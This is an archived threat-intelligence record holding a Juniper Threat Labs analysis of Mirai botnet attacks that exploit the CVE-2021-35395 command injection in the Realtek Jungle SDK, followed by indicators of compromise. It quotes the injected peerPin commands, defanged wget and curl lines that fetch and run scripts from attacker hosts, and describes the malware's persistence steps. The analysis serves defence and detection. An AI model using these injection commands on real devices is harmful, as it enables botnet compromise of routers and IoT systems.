{
	"id": "580beb8c-422b-4b04-806b-b469f42a55c5",
	"created_at": "2026-04-06T00:17:17.592511Z",
	"updated_at": "2026-04-10T13:11:36.927114Z",
	"deleted_at": null,
	"sha1_hash": "00266e684da869a52ffd1f00d99377411dca3c1e",
	"title": "Attacks Continue Against Realtek Vulnerabilities",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 985875,
	"plain_text": "Attacks Continue Against Realtek Vulnerabilities\r\nBy Asher Langton, Alex Burt\r\nPublished: 2021-09-02 · Archived: 2026-04-05 15:34:51 UTC\r\nAttacks Continue Against Realtek Vulnerabilities\r\nAs we predicted in last week’s post, threat actors continue to utilize new Realtek vulnerabilities disclosed by IoT\r\nInspector Research Lab to distribute malware. Starting on August 19th, Juniper Threat Labs observed a new set of\r\nattacks in the wild on IoT firmware built with the Realtek SDK, this time targeting CVE-2021-35395, which was\r\njust disclosed on August 16 by IoT Inspector. (Some of these attacks were previously noted in a SAM Seamless\r\nNetwork blog post.) These attacks are ongoing.\r\nThe Attack\r\nThe vulnerabilities in CVE-2021-35395 affect software built with the Realtek Jungle SDK (versions v2.x up to\r\nv3.4.14B) that utilize an SDK-provided management interface over HTTP. Among these vulnerabilities is a\r\ncommand injection on the “formWsc” page caused by a failure to sanitize input. Upon receiving the peerPin\r\nparameter, the server copies the submitted value directly into a shell command string which is then executed:\r\n\"iwpriv wlan%d-vxd set_mib pin=%s\"\r\nThe “%s” (in bold) is replaced by the contents of peerPin. By adding a semicolon to terminate the iwpriv\r\nstatement, it is possible to execute arbitrary commands on the device. For example, given an HTTP POST request\r\nhttps://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities\r\nPage 1 of 8\n\ncontaining “peerPin=12345;malicious_command”, the device will first execute the iwpriv command as expected,\r\nbut will then also execute malicious_command.\r\nIn one set of observed attacks, starting on August 24th, the attackers sent POST requests similar to the following:\r\nFigure 1. Malicious POST request exploiting CVE-2021-35395.\r\nThe injected command is:\r\nwget hxxp://37[.]0.11.132/rh -O - | sh\r\nwhich downloads and executes a script named ‘rh’:\r\nFigure 2. Malicious script downloaded by the injected command.\r\nThis script is nearly identical to the one featured in last week’s post. The only change is that the parameter passed\r\nto the downloaded binary is “exploit.realtek.http” instead of “exploit.realtek”. When the botnet agent starts up, it\r\nopens a listening port on port 44842, and then opens a TCP connection to babaroga[.]lib (188[.]166.196.89,\r\nresolved specifically by DNS server 185[.]121.177.177) on port 53 and registers the compromised computer with\r\nthe botnet, including an identifier — in this case, “exploit.realtek.http” — to indicate which attack was successful.\r\nWe observed another set of attacks, first noted by SAM Seamless Network, that also used the same proof-of-concept exploit from the initial disclosure but with a different payload:\r\nhttps://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities\r\nPage 2 of 8\n\nFigure 3. Another example of a POST request exploiting CVE-2021-35395.\r\nThe injected commands in the peerPin parameter attempt to download a malicious script called lolol.sh using\r\neither wget or curl and then execute it:\r\ncd /tmp;\r\nwget hxxp://212[.]192.241.87/lolol.sh;\r\ncurl -O hxxp://212[.]192.241.87/lolol.sh;\r\nchmod 777 lolol.sh;\r\nsh lolol.sh;\r\nThe lolol.sh script starts by deleting logs and killing a large number of named processes and services, then\r\nspecifically finding and killing processes using a significant amount of CPU time:\r\nhttps://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities\r\nPage 3 of 8\n\nFigure 4. lolol.sh terminating other processes on the target device.\r\nhttps://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities\r\nPage 4 of 8\n\nThe script then tries to download a set of malicious binaries, one for each common CPU architecture. As before,\r\nthe final payload is Mirai botnet malware. Each binary is renamed to nginx (a common web server and load\r\nbalancer) before the script attempts to run it. Only the binary matching the target device architecture will\r\nsuccessfully execute, and that process will immediately rename itself to avoid being terminated the next time\r\nlolol.sh runs. (Line 60 appears to be an error in the script.)\r\nFigure 5. lolol.sh attempting to download and execute Mirai binaries.\r\nTo ensure persistence, the script downloads the latest version of lolol.sh and sets it to run every 10 minutes as a\r\ncron job.\r\nhttps://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities\r\nPage 5 of 8\n\nFigure 6. lolol.sh installing itself as a cron job.\r\nFinally, the script adds firewall rules to prevent the device from being reinfected, blocking inbound connectivity to\r\nthe ports to which the vulnerable server is known to bind.\r\nFigure 7. lolol.sh blocking reinfection via the Linux firewall.\r\nDetection\r\nhttps://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities\r\nPage 6 of 8\n\nThe malicious POST requests exploiting CVE-2021-35395 are detected by Juniper’s NGFW SRX series with IDP\r\nsignature APP:MISC:REALTEK-JUNGLE-SDK-CI. The binaries and servers used in these attacks are blocked by\r\nJuniper Advanced Threat Prevention Cloud.\r\nFigure 8. Detection of malicious binaries by Juniper ATP Cloud.\r\nIOCs\r\n26a79029381745c4a9fce656f49d84ca058c132cc228316b359a36f6a505b057 dark.86_64\r\n0473ad0259470808a1647ab093f735d8ba2e2b38161c6cc01018505079f850db dark.arm5\r\n1a4077a5babf5eb892e573334a260d7457871ff608ee5755bee706acf14c2148 dark.arm6\r\nc481c8ae614abb2c7bf0ffd8094dabb6edc22c9146854ce1ee937ff6f9b3caf4 dark.arm7\r\nd7c66e79fe334f528efb926f4eb9494ac915a83964d11c2d5bad5407e4b483fa dark.m68k\r\n171b3c4c6bc55c1e267929962105bd77d62e647b4c7beb56d0a61c23a129d9f3 dark.mips\r\n3bd4a60d5614e77b2f0c08d27f184d698097c84368e377a4c5376f99a735dcf0 dark.mpsl\r\nc1064e2b8be2015d06d11492d25931e8739028bdb89c8f0510b04278aa1b944b dark.ppc\r\nf76d017a46373a16338dc55d1468e126850fdea5800dcf7f9800b25dd43ad84b dark.sh4\r\neb9e47d6c312374a4d00b96cc9b0df3fa5f62d5aad3c892a44c62e34e464f7a3 dark.x86\r\n9793ac5afd1be5ec55476d2c205260d1b7af6db7cc29a9dc0f7fbee68a177c78 lolol.sh\r\n0018e361be72a44b7b38bbecfede8d571418e56d4d62a8e186991bef322a0c16 b.arm5\r\n171961046ee6d18424cf466ad7e01096aecf48ed602d8725e6563ad8c61f1115 b.arm7\r\n924b6aec8aa5935e27673ee96d43dd0d1b60f044383b558e3f66cd4331f17ef4 b.mips\r\n98fc6b2cbd04362dc10a5445c00c23c2a2cb39d24d91beab3c200f87bfd889ab b.mpsl\r\n9bdb7d4778261bb34df931b41d32ee9188d0c7a7e10d4d68d56f6faebd047fe4 b.sh4\r\n2b57648fe6a75b589517cac9c515e0e6739c4aa39bfe7b3e81e2460b60edecd4 rh\r\n37[.]0.11.132\r\n212[.]192.241.72\r\n212[.]192.241.87\r\n103[.]113.143.232\r\n103[.]142.18.38\r\n103[.]142.18.60\r\n103[.]242.224.152\r\n103[.]242.224.164\r\nhttps://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities\r\nPage 7 of 8\n\n103[.]242.224.179\r\n117[.]210.156.253\r\n122[.]169.57.70\r\n185[.]222.59.10\r\n31[.]210.20.100\r\nbabaroga[.]lib (resolved by 185[.]121.177.177)\r\n188[.]166.196.89\r\nSource: https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities\r\nhttps://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities"
	],
	"report_names": [
		"attacks-continue-against-realtek-vulnerabilities"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434637,
	"ts_updated_at": 1775826696,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/00266e684da869a52ffd1f00d99377411dca3c1e.pdf",
		"text": "https://archive.orkl.eu/00266e684da869a52ffd1f00d99377411dca3c1e.txt",
		"img": "https://archive.orkl.eu/00266e684da869a52ffd1f00d99377411dca3c1e.jpg"
	}
}